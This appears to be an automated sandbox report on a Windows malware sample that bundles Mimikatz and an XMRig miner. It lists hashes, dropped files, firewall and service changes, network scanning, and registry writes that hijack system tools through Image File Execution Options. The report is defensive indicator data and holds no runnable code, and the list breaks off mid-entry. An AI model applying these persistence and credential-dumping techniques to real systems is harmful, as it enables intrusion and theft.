Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 13:48
Behavioral task
behavioral1
Sample
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
6f9e36e57297c31b816334750f50f887
-
SHA1
660b1b9e7e6048f7c168dafcb513f0a2906dd729
-
SHA256
53dc7b99cdb3d5dffb9adf9bfeb240e658275ceebcc801d32b5f8a60404c087a
-
SHA512
709fa850e551145bf3f29c2db770ee8cbcf3dc2b4baeb4057f21a3135aae99bebf4bf00873277c3f2c24a39681c74359668e522f45b49f478166f54be239d265
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
lebulsi.exedescription pid Process procid_target PID 1920 created 1004 1920 lebulsi.exe 37 -
Xmrig family
-
Contacts a large (20637) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/3600-179-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-183-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-201-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-213-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-222-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-233-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-248-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-495-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-496-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig behavioral2/memory/3600-544-0x00007FF63D840000-0x00007FF63D960000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3656-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3656-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c7a-6.dat mimikatz behavioral2/memory/4828-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3928-136-0x00007FF78C4F0000-0x00007FF78C5DE000-memory.dmp mimikatz behavioral2/memory/3928-138-0x00007FF78C4F0000-0x00007FF78C5DE000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
Processes:
lebulsi.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts lebulsi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
lebulsi.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe lebulsi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 724 netsh.exe 3012 netsh.exe -
Executes dropped EXE 27 IoCs
Processes:
lebulsi.exelebulsi.exewpcap.exebdltnuisb.exevfshost.exexohudmc.exejobnkm.exesadefbibf.exeuuetgf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exelebulsi.exeysesbhsym.exepid Process 4828 lebulsi.exe 1920 lebulsi.exe 4920 wpcap.exe 3636 bdltnuisb.exe 3928 vfshost.exe 3484 xohudmc.exe 2052 jobnkm.exe 880 sadefbibf.exe 3600 uuetgf.exe 1532 sadefbibf.exe 4124 sadefbibf.exe 4568 sadefbibf.exe 1768 sadefbibf.exe 1608 sadefbibf.exe 4024 sadefbibf.exe 4004 sadefbibf.exe 1872 sadefbibf.exe 4304 sadefbibf.exe 4108 sadefbibf.exe 3180 sadefbibf.exe 1044 sadefbibf.exe 3752 sadefbibf.exe 4524 sadefbibf.exe 2800 sadefbibf.exe 1532 sadefbibf.exe 996 lebulsi.exe 1680 ysesbhsym.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebdltnuisb.exepid Process 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 4920 wpcap.exe 3636 bdltnuisb.exe 3636 bdltnuisb.exe 3636 bdltnuisb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 71 ifconfig.me 72 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
lebulsi.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 lebulsi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft lebulsi.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 lebulsi.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData lebulsi.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\jobnkm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\jobnkm.exe xohudmc.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cd9-135.dat upx behavioral2/memory/3928-136-0x00007FF78C4F0000-0x00007FF78C5DE000-memory.dmp upx behavioral2/memory/3928-138-0x00007FF78C4F0000-0x00007FF78C5DE000-memory.dmp upx behavioral2/files/0x0007000000023ce4-155.dat upx behavioral2/memory/880-156-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/880-160-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/files/0x0007000000023ce1-164.dat upx behavioral2/memory/3600-165-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/1532-172-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/4124-176-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-179-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/4568-181-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-183-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/1768-186-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/1608-190-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/4024-194-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/4004-198-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-201-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/1872-203-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/4304-207-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/4108-211-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-213-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/3180-216-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/1044-220-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-222-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/3752-225-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/4524-229-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/2800-232-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-233-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/1532-235-0x00007FF63BCF0000-0x00007FF63BD4B000-memory.dmp upx behavioral2/memory/3600-248-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/3600-495-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/3600-496-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx behavioral2/memory/3600-544-0x00007FF63D840000-0x00007FF63D960000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exelebulsi.exeysesbhsym.execmd.exedescription ioc Process File created C:\Windows\seumlgyb\lebulsi.exe 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe File created C:\Windows\zthyliniv\UnattendGC\specials\exma-1.dll lebulsi.exe File created C:\Windows\zthyliniv\upbdrjv\swrpwe.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\coli-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\AppCapture32.dll lebulsi.exe File created C:\Windows\ime\lebulsi.exe lebulsi.exe File opened for modification C:\Windows\zthyliniv\eftbbbiir\Packet.dll lebulsi.exe File opened for modification C:\Windows\seumlgyb\schoedcl.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\spoolsrv.exe lebulsi.exe File created C:\Windows\seumlgyb\svschost.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\vimpcsvc.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\lebulsi.exe 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe File created C:\Windows\zthyliniv\UnattendGC\specials\tucl-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\xdvl-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\docmicfg.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\mimidrv.sys lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\cnli-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\vimpcsvc.xml lebulsi.exe File created C:\Windows\seumlgyb\vimpcsvc.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\libeay32.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\trch-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\ucl.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\spoolsrv.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\mimilib.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\ip.txt lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\posh-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\tibe-2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\trfo-2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\vimpcsvc.xml lebulsi.exe File created C:\Windows\seumlgyb\spoolsrv.xml lebulsi.exe File opened for modification C:\Windows\zthyliniv\eftbbbiir\Result.txt ysesbhsym.exe File created C:\Windows\zthyliniv\UnattendGC\specials\vimpcsvc.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\schoedcl.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\schoedcl.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\scan.bat lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\Packet.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\crli-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\docmicfg.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\schoedcl.xml lebulsi.exe File created C:\Windows\seumlgyb\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\vfshost.exe lebulsi.exe File opened for modification C:\Windows\zthyliniv\Corporate\log.txt cmd.exe File created C:\Windows\zthyliniv\eftbbbiir\wpcap.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\zlib1.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\AppCapture64.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\wpcap.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\libxml2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\ssleay32.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\svschost.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\svschost.xml lebulsi.exe File created C:\Windows\seumlgyb\schoedcl.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\Shellcode.ini lebulsi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2684 sc.exe 5028 sc.exe 2156 sc.exe 1160 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exeschtasks.exenetsh.exenetsh.exenetsh.exesc.execmd.execmd.execmd.exenetsh.exenet1.exenet.execmd.exenet.execmd.exenet.execacls.execmd.execmd.execmd.exenetsh.exenetsh.exenetsh.exenetsh.execmd.exenet1.exejobnkm.execmd.exenetsh.exenet.execmd.exenetsh.execmd.execmd.exenet1.execmd.execmd.exesc.exe2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exenetsh.exenetsh.exenetsh.execmd.execmd.exenet.exexohudmc.exeysesbhsym.exelebulsi.execacls.execmd.exenetsh.execmd.exenet1.exewpcap.execmd.exenet1.exebdltnuisb.exenetsh.execmd.exenet.exenet1.execmd.execacls.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe 